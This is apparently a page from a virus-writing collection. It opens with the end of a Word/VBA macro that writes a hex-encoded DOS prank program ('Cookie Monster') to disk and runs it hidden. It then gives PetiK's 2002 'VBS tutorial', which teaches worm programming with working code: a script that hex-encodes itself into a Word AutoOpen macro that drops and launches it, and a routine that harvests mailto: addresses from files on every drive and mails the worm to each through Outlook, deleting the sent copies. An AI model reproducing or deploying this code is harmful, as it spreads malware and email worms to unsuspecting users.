04" Print #1, "e 0570 8B E5 33 C0 50 B8 D0 0D 50 B8 09 00 50 E8 C1 04" Print #1, "e 0580 8B E5 33 C0 50 B8 F7 0D 50 B8 09 00 50 E8 B1 04" Print #1, "e 0590 8B E5 E8 C9 04 A3 DC 0F 25 30 00 3D 30 00 75 0E" Print #1, "e 05A0 C7 06 09 10 00 B0 C7 06 07 10 00 00 EB 0C C7 06" Print #1, "e 05B0 09 10 00 B8 C7 06 07 10 00 00 8B 5E 06 83 7F 02" Print #1, "e 05C0 00 74 3F 8B 5E 06 FF 77 02 E8 69 04 59 A3 DA 0F" Print #1, "e 05D0 3D 09 00 7E 0D 3D E9 03 7D 08 A3 A6 0A A3 A8 0A" Print #1, "e 05E0 EB 20 33 C0 50 B8 10 0E 50 B8 09 00 50 E8 51 04" Print #1, "e 05F0 8B E5 33 C0 50 B8 42 0E 50 B8 09 00 50 E8 41 04" Print #1, "e 0600 8B E5 B8 09 00 50 E8 8C 04 59 89 16 05 10 A3 03" Print #1, "e 0610 10 B8 5F 03 BA 00 00 52 50 B8 09 00 50 E8 85 04" Print #1, "e 0620 8B E5 33 D2 B8 0D 00 52 50 52 52 8B C2 50 E8 33" Print #1, "e 0630 04 83 C4 06 52 50 0E E8 CE 04 A3 A4 0A E8 0B 00" Print #1, "e 0640 50 B0 00 50 E8 AE 04 8B E5 5D C3 A1 93 0A 05 0F" Print #1, "e 0650 00 B9 04 00 D3 E8 8C DA 03 C2 2B 06 8B 0A C3 50" Print #1, "e 0660 53 51 52 06 1E 56 57 55 2E 8E 1E 50 02 E4 60 A2" Print #1, "e 0670 DE 0F 9C FF 1E 03 10 A1 A6 0A 99 52 50 33 C0 50" Print #1, "e 0680 50 50 E8 DF 03 83 C4 06 52 50 0E E8 7A 04 0B D0" Print #1, "e 0690 75 15 83 3E A2 0A 01 74 0E FF 06 A2 0A E8 24 02" Print #1, "e 06A0 E8 0E 00 FF 0E A2 0A 5D 5F 5E 1F 07 5A 59 5B 58" Print #1, "e 06B0 CF E8 7B 01 E8 AA 01 33 C0 50 B8 E1 0F 50 B8 DF" Print #1, "e 06C0 0F 50 E8 2A 02 83 C4 06 33 C0 50 B8 24 00 50 B8" Print #1, "e 06D0 04 00 50 E8 06 02 83 C4 06 33 C0 50 B8 0F 00 50" Print #1, "e 06E0 B8 12 00 50 B8 E3 0F 50 E8 5A 02 83 C4 08 A1 A4" Print #1, "e 06F0 0A BA 0F 00 F7 E2 05 AA 0A 50 B8 E3 0F 50 E8 B9" Print #1, "e 0700 05 59 59 0B C0 74 71 33 D2 B8 05 00 52 50 52 52" Print #1, "e 0710 8B C2 50 E8 4E 03 83 C4 06 52 50 0E E8 E9 03 A3" Print #1, "e 0720 F3 0F 33 C0 50 A1 F3 0F BA 11 00 F7 E2 05 6D 0B" Print #1, "e 0730 50 E8 CB 05 59 D1 E8 BA 28 00 2B D0 52 B8 06 00" Print #1, "e 0740 50 E8 98 01 83 C4 06 33 C0 50 B8 0F 00 50 A1 F3" Print #1, "e 0750 0F BA 11 00 F7 E2 05 6D 0B 50 E8 C3 01 83 C4 06" Print #1, "e 0760 83 3E A6 0A 0A 7F 03 E9 88 00 A1 A6 0A BB 02 00" Print #1, "e 0770 99 F7 FB A3 A6 0A EB 7A 33 D2 B8 05 00 52 50 52" Print #1, "e 0780 52 8B C2 50 E8 DD 02 83 C4 06 52 50 0E E8 78 03" Print #1, "e 0790 A3 F3 0F 33 C0 50 A1 F3 0F BA 11 00 F7 E2 05 C2" Print #1, "e 07A0 0B 50 E8 5A 05 59 D1 E8 BA 28 00 2B D0 52 B8 06" Print #1, "e 07B0 00 50 E8 27 01 83 C4 06 33 C0 50 B8 0F 00 50 A1" Print #1, "e 07C0 F3 0F BA 11 00 F7 E2 05 C2 0B 50 E8 52 01 83 C4" Print #1, "e 07D0 06 A1 A8 0A A3 A6 0A 33 D2 B8 0D 00 52 50 52 52" Print #1, "e 07E0 8B C2 50 E8 7E 02 83 C4 06 52 50 0E E8 19 03 A3" Print #1, "e 07F0 A4 0A C7 06 F3 0F 00 00 EB 04 FF 06 F3 0F 81 3E" Print #1, "e 0800 F3 0F 00 7D 7C F4 C7 06 F3 0F 00 00 EB 04 FF 06" Print #1, "e 0810 F3 0F 81 3E F3 0F 00 7D 7C F4 33 C0 50 FF 36 E1" Print #1, "e 0820 0F FF 36 DF 0F E8 B4 00 83 C4 06 E8 1A 00 C3 B8" Print #1, "e 0830 A0 0F 50 B8 0B 10 50 8C D8 50 33 C0 50 A1 09 10" Print #1, "e 0840 50 E8 46 03 83 C4 0A C3 B8 A0 0F 50 33 C0 50 A1" Print #1, "e 0850 09 10 50 B8 0B 10 50 8C D8 50 E8 2D 03 83 C4 0A" Print #1, "e 0860 C3 C4 1E 07 10 81 C3 54 01 8C 06 FD 0F 89 1E FB" Print #1, "e 0870 0F C7 06 F9 0F 17 0C C7 06 F5 0F 00 00 EB 3D C7" Print #1, "e 0880 06 F7 0F 00 00 EB 25 8B 1E F9 0F 8A 07 C4 1E FB" Print #1, "e 0890 0F 26 88 07 FF 06 FB 0F FF 06 F9 0F 8B 1E FB 0F" Print #1, "e 08A0 26 C6 07 1E FF 06 FB 0F FF 06 F7 0F 83 3E F7 0F" Print #1, "e 08B0 3C 7C D4 83 06 FB 0F 28 FF 06 F5 0F 83 3E F5 0F" Print #1, "e 08C0 07 7C BC C3 33 C0 50 E8 AE 01 59 A3 FF 0F A9 FF" Print #1, "e 08D0 00 74 05 25 FF 00 EB 03 A1 FF 0F C3 55 8B EC B8" Print #1, "e 08E0 00 02 8A 56 06 8A 76 04 8A 7E 08 CD 10 5D C3 55" Print #1, "e 08F0 8B EC B8 00 03 8A 7E 08 CD 10 8A C2 B4 00 8B 5E" Print #1, "e 0900 06 89 07 8A C6 B4 00 8B 5E 04 89 07 5D C3 55 8B" Print #1, "e 0910 EC B4 0E 8A 46 04 8A 5E 06 8A 7E 08 CD 10 5D C3" Print #1, "e 0920 55 8B EC 8B 5E 04 FF 46 04 8A 07 A2 01 10 0A C0" Print #1, "e 0930 74 11 FF 76 08 FF 76 06 FF 36 01 10 E8 CF FF 8B" Print #1, "e 0940 E5 EB E0 5D C3 56 57 55 8B EC 8B 7E 0C 8B 76 08" Print #1, "e 0950 33 C0 50 E8 22 01 59 A2 02 10 80 F8 0D 74 59 A0" Print #1, "e 0960 02 10 B4 00 3D 08 00 74 07 3D 1B 00 74 E2 EB 34" Print #1, "e 0970 83 3E BC 0D 00 7E D9 4E FF 0E BC 0D FF 76 0E 57" Print #1, "e 0980 FF 36 02 10 E8 87 FF 8B E5 FF 76 0E 57 B0 20 50" Print #1, "e 0990 E8 7B FF 8B E5 FF 76 0E 57 FF 36 02 10 E8 6E FF" Print #1, "e 09A0 8B E5 EB AC A1 BC 0D 3B 46 0A 7D A4 A0 02 10 88" Print #1, "e 09B0 04 46 FF 06 BC 0D EB DD C6 04 00 C7 06 BC 0D 00" Print #1, "e 09C0 00 5D 5F 5E C3 56 57 55 8B EC 55 8B 76 08 FC 2B" Print #1, "e 09D0 C0 99 B9 0A 00 B7 00 BF 77 0E 8A 1C 46 F6 01 01" Print #1, "e 09E0 75 F8 BD 00 00 80 FB 2B 74 06 80 FB 2D 75 04 45" Print #1, "e 09F0 8A 1C 46 80 FB 39 77 2E 80 EB 30 72 29 F7 E1 03" Print #1, "e 0A00 C3 12 D6 74 EB EB 12 8B FA B9 0A 00 F7 E1 97 87" Print #1, "e 0A10 D1 F7 E2 92 97 03 C3 13 D1 8A 1C 46 80 FB 39 77" Print #1, "e 0A20 05 80 EB 30 73 E1 4D 7C 07 F7 DA F7 D8 83 DA 00" Print #1, "e 0A30 5D 5D 5F 5E C3 55 8B EC FF 76 04 E8 87 FF 59 5D" Print #1, "e 0A40 C3 56 57 55 8B EC 8A 66 08 8A 46 0C 8B 56 0A F8" Print #1, "e 0A50 CD 21 72 02 EB 04 50 E8 5C 00 5D 5F 5E C3 CD 11" Print #1, "e 0A60 C3 CD 12 C3 55 8B EC 8A 66 04 8B 4E 08 8B 56 06" Print #1, "e 0A70 CD 1A 8B C2 8B D1 5D C3 55 8B EC 8A 66 04 CD 16" Print #1, "e 0A80 75 0A 83 7E 04 01 75 04 33 C0 EB 00 5D C3 C7 06" Print #1, "e 0A90 91 0A 00 00 CB 55 8B EC 8A 46 04 B4 35 CD 21 8B" Print #1, "e 0AA0 C3 8C C2 5D C3 55 8B EC 1E C5 56 06 8A 46 04 B4" Print #1, "e 0AB0 25 CD 21 1F 5D C3 56 57 55 8B EC 8B 76 08 0B F6" Print #1, "e 0AC0 7C 11 83 FE 58 77 23 89 36 78 0F 8A 84 7A 0F 98" Print #1, "e 0AD0 96 EB 0D F7 DE 83 FE 22 77 10 C7 06 78 0F FF FF" Print #1, "e 0AE0 8B C6 A3 8F 0A B8 FF FF EB 05 BE 57 00 EB D8 5D" Print #1, "e 0AF0 5F 5E C2 02 00 55 8B EC 8B 56 06 8A 46 04 B4 31" Print #1, "e 0B00 CD 21 5D C3 B1 03 EB 0A B1 02 EB 06 B1 01 EB 02" Print #1, "e 0B10 33 C9 55 56 57 8B EC 8B 46 0A 8B 56 0C 8B 5E 0E" Print #1, "e 0B20 8B 6E 10 33 F6 F6 C1 01 75 1A 0B D2 79 09 F7 DA" Print #1, "e 0B30 F7 D8 1B D6 80 C9 04 0B ED 79 09 F7 DD F7 DB 1B" Print #1, "e 0B40 EE 80 F1 04 8B FD 0B FA 75 06 F7 F3 87 F2 EB 20" Print #1, "e 0B50 51 B9 20 00 8B FE D1 E0 D1 D2 D1 D6 D1 D7 3B FD" Print #1, "e 0B60 72 0B 77 04 3B F3 72 05 2B F3 1B FD 40 E2 E7 59" Print #1, "e 0B70 F6 C1 02 74 03 96 8B D7 F6 C1 04 74 07 F7 DA F7" Print #1, "e 0B80 D8 83 DA 00 5F 5E 5D CA 08 00 56 57 55 8B EC FC" Print #1, "e 0B90 8B 4E 10 8B 7E 0E 8E 46 0C 8B 76 0A 1E 8E 5E 08" Print #1, "e 0BA0 D1 E9 F3 A5 73 01 A4 1F 5D 5F 5E C3 55 8B EC FF" Print #1, "e 0BB0 76 08 FF 76 06 8B 46 06 33 D2 52 FF 76 04 8B 46" Print #1, "e 0BC0 04 33 D2 52 E8 C3 FF 8B E5 5D C3 00 00 00 00 00" Print #1, "e 0BD0 00 2E 8F 06 CB 08 2E 8C 1E CD 08 FC 8E 06 8B 0A" Print #1, "e 0BE0 BE 80 00 33 C0 8B D8 8B D0 8B C8 26 AC 8B FE 93" Print #1, "e 0BF0 26 88 01 43 87 D9 E8 15 00 77 07 72 3F E8 0E 00" Print #1, "e 0C00 77 F9 3C 20 74 04 3C 09 75 EC 32 C0 EB E8 0B C0" Print #1, "e 0C10 74 07 42 AA 0A C0 75 01 43 86 E0 32 C0 F9 E3 18" Print #1, "e 0C20 26 AC 49 2C 22 74 11 04 22 3C 5C 75 09 26 80 3C" Print #1, "e 0C30 22 75 03 26 AC 49 0B F6 C3 E9 F7 F8 8C C5 8B 36" Print #1, "e 0C40 85 0A 83 C6 02 B9 01 00 80 3E 8D 0A 03 72 0F 8E" Print #1, "e 0C50 06 87 0A 8B FE B1 7F F2 AE E3 DE 80 F1 7F 43 89" Print #1, "e 0C60 1E 7F 0A 43 8B C1 03 C2 03 DB 05 01 00 25 FE FF" Print #1, "e 0C70 03 D8 8B FC 2B F8 2B E3 87 DD 8B EC 89 26 81 0A" Print #1, "e 0C80 8C D0 8E C0 89 7E 00 83 C5 02 8E 1E 87 0A 49 F3" Print #1, "e 0C90 A4 32 C0 AA 8E DB 87 CA BE 81 00 E3 0E 89 7E 00" Print #1, "e 0CA0 83 C5 02 AC 0A C0 AA E0 FA 74 F0 33 C0 89 46 00" Print #1, "e 0CB0 2E 8E 1E CD 08 2E FF 26 CB 08 56 57 55 8B EC 8B" Print #1, "e 0CC0 76 08 8B 7E 0A 8C D8 8E C0 FC AC 0A C0 74 27 AE" Print #1, "e 0CD0 74 F8 26 8A 65 FF 3C 61 72 06 3C 7A 77 02 2C 20" Print #1, "e 0CE0 80 FC 61 72 08 80 FC 7A 77 03 80 EC 20 3A C4 74" Print #1, "e 0CF0 D9 2A C4 98 EB 05 26 8A 25 EB F6 5D 5F 5E C3 56" Print #1, "e 0D00 57 55 8B EC 8B 7E 08 8C D8 8E C0 B0 00 B9 FF FF" Print #1, "e 0D10 FC F2 AE 8B C1 F7 D0 48 5D 5F 5E C3 00 00 00 00" Print #1, "e 0D20 00 00 00 00 54 75 72 62 6F 2D 43 20 2D 20 43 6F" Print #1, "e 0D30 70 79 72 69 67 68 74 20 28 63 29 20 31 39 38 37" Print #1, "e 0D40 20 42 6F 72 6C 61 6E 64 20 49 6E 74 6C 2E 00 44" Print #1, "e 0D50 69 76 69 64 65 20 65 72 72 6F 72 0D 0A 41 62 6E" Print #1, "e 0D60 6F 72 6D 61 6C 20 70 72 6F 67 72 61 6D 20 74 65" Print #1, "e 0D70 72 6D 69 6E 61 74 69 6F 6E 0D 0A 00 00 00 00 00" Print #1, "e 0D80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0D90 00 00 00 AC 1F 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0DA0 00 00 00 00 00 00 E8 03 E8 03 63 68 6F 63 6F 6C" Print #1, "e 0DB0 61 74 65 20 63 68 69 70 00 6F 72 65 6F 00 00 00" Print #1, "e 0DC0 00 00 00 00 00 00 00 00 6D 61 63 61 72 6F 6F 6E" Print #1, "e 0DD0 00 00 00 00 00 00 00 6F 61 74 6D 65 61 6C 00 00" Print #1, "e 0DE0 00 00 00 00 00 00 70 65 61 6E 75 74 20 62 75 74" Print #1, "e 0DF0 74 65 72 00 00 66 69 67 20 6E 65 77 74 6F 6E 00" Print #1, "e 0E00 00 00 00 00 6C 61 64 79 20 66 69 6E 67 65 72 73" Print #1, "e 0E10 00 00 00 73 75 67 61 72 00 00 00 00 00 00 00 00" Print #1, "e 0E20 00 00 76 61 6E 69 6C 6C 61 20 77 61 66 65 72 73" Print #1, "e 0E30 00 70 65 63 61 6E 20 73 61 6E 64 69 65 73 00 00" Print #1, "e 0E40 63 68 69 70 73 20 61 68 6F 79 00 00 00 00 00 67" Print #1, "e 0E50 69 6E 67 65 72 20 73 6E 61 70 73 00 00 00 67 69" Print #1, "e 0E60 72 6C 20 73 63 6F 75 74 00 00 00 00 00 42 6C 65" Print #1, "e 0E70 63 68 21 21 21 00 00 00 00 00 00 00 00 00 4D 65" Print #1, "e 0E80 20 6E 6F 20 6C 69 6B 65 20 74 68 61 74 2E 00 59" Print #1, "e 0E90 75 63 6B 21 21 21 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0EA0 55 67 68 2E 2E 2E 00 00 00 00 00 00 00 00 00 00" Print #1, "e 0EB0 00 41 72 67 68 68 68 21 21 00 00 00 00 00 00 00" Print #1, "e 0EC0 00 00 4D 6D 6D 6D 2E 2E 2E 20 6D 65 20 6C 69 6B" Print #1, "e 0ED0 65 21 00 59 75 6D 6D 6D 59 75 6D 6D 6D 00 00 00" Print #1, "e 0EE0 00 00 00 00 4F 68 20 62 6F 79 2E 2E 2E 20 54 61" Print #1, "e 0EF0 6E 6B 73 00 00 44 65 6C 69 63 69 6F 75 73 2E 2E" Print #1, "e 0F00 2E 00 00 00 00 00 54 68 61 6E 6B 20 59 6F 75 00" Print #1, "e 0F10 00 00 00 00 00 00 00 C9 CD CD CD CD CD CD CD CD" Print #1, "e 0F20 CD CD CD CD CD CD CD CD 20 49 6E 66 6F 2D 54 65" Print #1, "e 0F30 63 68 20 43 6F 6F 6B 69 65 20 4D 6F 6E 73 74 65" Print #1, "e 0F40 72 20 CD CD CD CD CD CD CD CD CD CD CD CD CD CD" Print #1, "e 0F50 CD CD BB BA 20 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 0F60 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 0F70 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 0F80 20 20 20 20 20 20 20 20 20 20 20 20 20 20 BA BA" Print #1, "e 0F90 20 20 20 20 20 20 20 20 20 47 69 6D 6D 65 20 61" Print #1, "e 0FA0 20 63 6F 6F 6B 69 65 21 20 20 20 20 20 20 20 20" Print #1, "e 0FB0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 0FC0 20 20 20 20 20 20 20 20 20 20 BA BA 20 20 20 20" Print #1, "e 0FD0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 0FE0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 0FF0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 1000 20 20 20 20 20 20 BA BA 20 20 20 20 20 20 20 20" Print #1, "e 1010 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 1020 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 1030 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 1040 20 20 BA BA 20 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 1050 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 1060 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 1070 20 20 20 20 20 20 20 20 20 20 20 20 20 20 BA C8" Print #1, "e 1080 CD CD CD CD CD CD CD CD CD CD CD CD CD CD CD CD" Print #1, "e 1090 CD CD CD CD CD CD CD CD CD CD CD CD CD CD CD CD" Print #1, "e 10A0 CD CD CD CD CD CD CD CD CD CD CD CD CD CD CD CD" Print #1, "e 10B0 CD CD CD CD CD CD CD CD CD CD BC 00 00 00 43 4F" Print #1, "e 10C0 4F 4B 49 45 20 4D 4F 4E 53 54 45 52 0D 0A 24 00" Print #1, "e 10D0 43 6F 70 79 72 69 67 68 74 20 28 63 29 20 31 39" Print #1, "e 10E0 38 37 20 62 79 20 57 61 6C 6B 65 72 20 41 72 63" Print #1, "e 10F0 68 65 72 0D 0A 24 00 49 6E 69 74 69 61 74 69 6E" Print #1, "e 1100 67 20 6C 75 72 6B 20 6D 6F 64 65 2E 0D 0A 24 00" Print #1, "e 1110 0D 0A 45 52 52 4F 52 20 2D 20 61 72 67 75 6D 65" Print #1, "e 1120 6E 74 20 6D 75 73 74 20 62 65 20 62 65 74 77 65" Print #1, "e 1130 65 6E 20 31 30 20 61 6E 64 20 31 30 30 30 0D 0A" Print #1, "e 1140 24 00 0D 0A 43 6F 6E 74 69 6E 75 69 6E 67 20 69" Print #1, "e 1150 6E 73 74 61 6C 6C 61 74 69 6F 6E 20 77 69 74 68" Print #1, "e 1160 20 61 20 64 65 66 61 75 6C 74 20 6F 66 20 31 30" Print #1, "e 1170 30 30 0D 0A 24 00 00 20 20 20 20 20 20 20 20 20" Print #1, "e 1180 21 21 21 21 21 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 1190 20 20 20 20 20 20 20 01 40 40 40 40 40 40 40 40" Print #1, "e 11A0 40 40 40 40 40 40 40 02 02 02 02 02 02 02 02 02" Print #1, "e 11B0 02 40 40 40 40 40 40 40 14 14 14 14 14 14 04 04" Print #1, "e 11C0 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04" Print #1, "e 11D0 04 04 40 40 40 40 40 40 18 18 18 18 18 18 08 08" Print #1, "e 11E0 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08" Print #1, "e 11F0 08 08 40 40 40 40 20 00 00 00 00 00 00 00 00 00" Print #1, "e 1200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 1210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 1220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 1230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 1240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 1250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 1260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 1270 00 00 00 00 00 00 00 00 00 00 00 13 02 02 04 05" Print #1, "e 1280 06 08 08 08 14 15 05 13 FF 16 05 16 02 FF FF FF" Print #1, "e 1290 FF FF FF FF FF FF FF FF FF FF 05 05 FF FF FF FF" Print #1, "e 12A0 FF FF FF FF FF FF FF FF FF FF FF FF 0F FF FF 02" Print #1, "e 12B0 FF 0F FF FF FF FF 13 FF FF 02 02 05 0F 02 FF FF" Print #1, "e 12C0 FF 13 FF FF FF FF FF FF FF FF FF FF FF FF FF FF" Print #1, "e 12D0 FF 13 FF 00 00 10 8E 07 8E 07 00" Print #1, "rcx" Print #1, "11DA" Print #1, "nC:\COOKIE.EXE" Print #1, "w" Print #1, "q" Close #1 Kill "c:\cookie" Shell "c:\cookie.exe", vbHide End Sub

articles

VBS tutorial PetiK VBS tutorial ************ by PetiK (05/05/2002) ################ # Introducion: # ################ I wrote this article after programming VBS.Xchange and VBS.Doublet (two VBS/DOC infectors). There are three parts in this article. - Hex Conversion : How convert a ascii file (VBS in a module of Word for example). - Spread with "mailto:" : spread a VBS worm with web files. - Random Name Generator : To change in each start a new copy of a VBS worm/virii. I succeeded to code without look at other source. This sort of aticle is of course not for good coderz but for the newbies (NOT LAMERZ) and all people who want learn about WORM programming. ################### # HEX CONVERSION: # ################### Why convert a file in hexadecimal ?? For example to put it in module of a Word dosument. How to do this ?? 1) Set fso=CreateObject("Scripting.FileSystemObject") Set fl=fso.OpenTextFile(WScript.ScriptFullname,1) virus=fl.ReadAll ' Read all the file fl.Close 2) For i=1 To len(virus) ' Take the size of the file 3) e=Mid(virus,i,1) ' Take one byte after one. e=Hex(Asc(e)) ' And convert in hexa. (P=50;e=65;...) 4) If Len(e)=1 Then ' If the hexa < 10h we add a 0 e="0"&e ' Example : return (0Dh0Ah). We will have D and A. End If ' So we add a 0 => 0D and 0A 5) f=f+e ' This part is for the lenght of the line in the module If Len(f)=110 Then ' of the document (don't support too long). sp.WriteLine "e = e + """+f+"""" ' Here we put 110 character: f="" ' e = e + "...110 char..." End If 6) If Len(virus)-i = 0 Then ' Here is for the last line if there are less 110 char : sp.WriteLine "e = e + """+f+"""" ' e = e + "... 1 < number of char < 110..." f="" End If So the code source : *********************************************************************************************************************** On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set fl=fso.OpenTextFile(WScript.ScriptFullname,1) virus=fl.ReadAll fl.Close set sp=fso.CreateTextFile("example_vbshex.txt",True,8) sp.WriteLine "Attribute VB_Name = ""VirModule""" sp.WriteLine "Sub AutoOpen()" sp.WriteLine "On Error Resume Next" sp.WriteLine "e = """"" For i=1 To len(virus) e=Mid(virus,i,1) e=Hex(Asc(e)) If Len(e)=1 Then e="0"&e End If f=f+e If Len(f)=110 Then sp.WriteLine "e = e + """+f+"""" f="" End If If Len(virus)-i = 0 Then sp.WriteLine "e = e + """+f+"""" f="" End If Next sp.WriteLine "read=dec(e)" sp.WriteLine "Open ""C:\newvbsfile.vbs"" For Output As #1" sp.WriteLine "Print #1, read" sp.WriteLine "Close #1" sp.WriteLine "Shell ""wscript C:\newvbsfile.vbs""" sp.WriteLine "End Sub" sp.WriteLine "" sp.WriteLine "Function dec(octe)" sp.WriteLine "For hexad = 1 To Len(octe) Step 2" sp.WriteLine "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))" sp.WriteLine "Next" sp.WriteLine "End Function" sp.Close ************************************************************************************************************************ And this is the result: ************************************************************************************************************************ Attribute VB_Name = "VirModule" Sub AutoOpen() On Error Resume Next e = "" e = e +"4F6E204572726F7220526573756D65204E6578740D0A5365742066736F3D4372656174654F626A6563742822536372697074696E672E46" e = e +"696C6553797374656D4F626A65637422290D0A53657420666C3D66736F2E4F70656E5465787446696C6528575363726970742E53637269" e = e +"707446756C6C6E616D652C31290D0A76697275733D666C2E52656164416C6C0D0A666C2E436C6F73650D0A0D0A7365742073703D66736F" e = e +"2E4372656174655465787446696C6528226578616D706C655F7662736865782E747874222C547275652C38290D0A73702E57726974654C" e = e +"696E6520224174747269627574652056425F4E616D65203D2022225669724D6F64756C652222220D0A73702E57726974654C696E652022" e = e +"537562204175746F4F70656E2829220D0A73702E57726974654C696E6520224F6E204572726F7220526573756D65204E657874220D0A73" e = e +"702E57726974654C696E65202265203D2022222222220D0A0D0A466F7220693D3120546F206C656E287669727573290D0A0D0A653D4D69" e = e +"642876697275732C692C31290D0A653D48657828417363286529290D0A0D0A4966204C656E2865293D31205468656E0D0A653D22302226" e = e +"650D0A456E642049660D0A0D0A663D662B650D0A4966204C656E2866293D313130205468656E0D0A73702E57726974654C696E65202265" e = e +"203D2065202B202222222B662B222222220D0A663D22220D0A456E642049660D0A0D0A4966204C656E287669727573292D69203D203020" e = e +"5468656E0D0A73702E57726974654C696E65202265203D2065202B202222222B662B222222220D0A663D22220D0A456E642049660D0A0D" e = e +"0A4E6578740D0A0D0A73702E57726974654C696E652022726561643D646563286529220D0A73702E57726974654C696E6520224F70656E" e = e +"202222433A5C6E657776627366696C652E766273222220466F72204F7574707574204173202331220D0A73702E57726974654C696E6520" e = e +"225072696E742023312C2072656164220D0A73702E57726974654C696E652022436C6F7365202331220D0A73702E57726974654C696E65" e = e +"20225368656C6C2022227773637269707420433A5C6E657776627366696C652E7662732222220D0A73702E57726974654C696E65202245" e = e +"6E6420537562220D0A73702E57726974654C696E652022220D0A73702E57726974654C696E65202246756E6374696F6E20646563286F63" e = e +"746529220D0A73702E57726974654C696E652022466F72206865786164203D203120546F204C656E286F6374652920537465702032220D" e = e +"0A73702E57726974654C696E652022646563203D20646563202620436872282222266822222026204D6964286F6374652C206865786164" e = e +"2C20322929220D0A73702E57726974654C696E6520224E657874220D0A73702E57726974654C696E652022456E642046756E6374696F6E" e = e + "220D0A73702E436C6F7365" read=dec(e) Open "C:\newvbsfile.vbs" For Output As #1 Print #1, read Close #1 Shell "wscript C:\newvbsfile.vbs" End Sub Function dec(octe) For hexad = 1 To Len(octe) Step 2 dec = dec & Chr("&h" & Mid(octe, hexad, 2)) Next End Function ************************************************************************************************************************ The function "dec" allows to convert in the opposite sense. ######################### # SPREAD WITH "MAILTO:" # ######################### Now we are going to see how spread a VBS worm without the Windows AddressBook (aka WAB). If we can't use the WAB, we can read old mail and take the EMail. But too bad, I don't code this in VBS. Last solution : take the EMail in the WEB file (htm, html, asp, etc...). When we see a link to send an mail by clicking this is the code: href="mailto:petikvx@aol.com">PetiKVX ------- There is always this string : "MAILTO:". So! Fine! We can scan all file to search this string and scan the EMail. 1) if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then ' Take the good extension ' htm, html, asp, doc, xls set htm=fso.OpenTextFile(fil.path,1) ' and open the file. verif=True allhtm=htm.ReadAll() ' Read all the file. htm.Close 2) For ml=1 To Len(allhtm) ' Get the size. count=0 3) If Mid(allhtm,ml,7) = "mailto:" Then ' Find the mailto: string. counter=counter+1 mlto="" 4) Do While Mid(allhtm,ml+6+count,1) <> """" ' Scan the EMail until the '"' string. count=count+1 mlto = mlto + Mid(allhtm,ml+6+count,1) loop 5) sendmailto(left(mlto,len(mlto)-1)) ' Send the mail And now, the code: ************************************************************************************************************************ On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set mel=fso.CreateTextFile("spread_mailto.txt",8,TRUE) counter=0 lect() mel.WriteLine "#" mel.Close WScript.Quit Sub lect() On Error Resume Next Set dr=fso.Drives For Each d in dr If d.DriveType=2 or d.DriveType=3 Then list(d.path&"\") End If Next End Sub Sub spreadmailto(dir) On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set f=fso.GetFolder(dir) Set cf=f.Files For Each fil in cf ext=fso.GetExtensionName(fil.path) ext=lcase(ext) if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then set htm=fso.OpenTextFile(fil.path,1) allhtm=htm.ReadAll() htm.Close For ml=1 To Len(allhtm) count=0 If Mid(allhtm,ml,7) = "mailto:" Then counter=counter+1 mlto="" Do While Mid(allhtm,ml+6+count,1) <> """" count=count+1 mlto = mlto + Mid(allhtm,ml+6+count,1) loop mel.WriteLine counter &" <"&left(mlto,len(mlto)-1)&">" msgbox mlto sendmailto(left(mlto,len(mlto)-1)) End If Next End If Next End Sub Sub list(dir) On Error Resume Next Set f=fso.GetFolder(dir) Set ssf=f.SubFolders For Each fil in ssf spreadmailto(fil.path) list(fil.path) Next End Sub Sub sendmailto(email) Set out=CreateObject("Outlook.Application") Set mailmelto=out.CreateItem(0) mailmelto.To email mailmelto.Subject "Subject of worm" mailmelto.Body "Body of worm" mailmelto.Attachment.Add (WScript.ScriptFullName) mailmelto.DeleteAfterSubmit = True mailmelto.Send Set out = Nothing End Sub ************************************************************************************************************************ In the spread_mailto.txt file we have this: ************************************************************************************************************************ 1 <Petikvx@aol.com> 2 <VBS.Ketip.A@mm> 3 <PetiK@aol.com> 4 <kavdaemon@relay.avp.ru> 5 <kavdaemon@relay.avp.ru>kavdaemon@relay.avp.ru</A></TD></TR> <TR class=aolmailheader> <TD noWrap vAlign=top width=> 6 <Pentasm99@aol.com> 7 <Pentasm99@aol.com screenname=> ... ... ************************************************************************************************************************ We can see of course some problems: - <VBS.Ketip.A@mm> : not a real EMail but a Norton Worm Name - <kavdaemon@relay.avp.ru>kavdaemon@relay.avp.ru</A></TD></TR> : <TR class=aolmailheader> : The scan doesn't found immediatly the '"' string. <TD noWrap vAlign=top width=> : - <Pentasm99@aol.com screenname=>: IDEM. It was not '"' the end of the mail but a space (20h) ########################## # 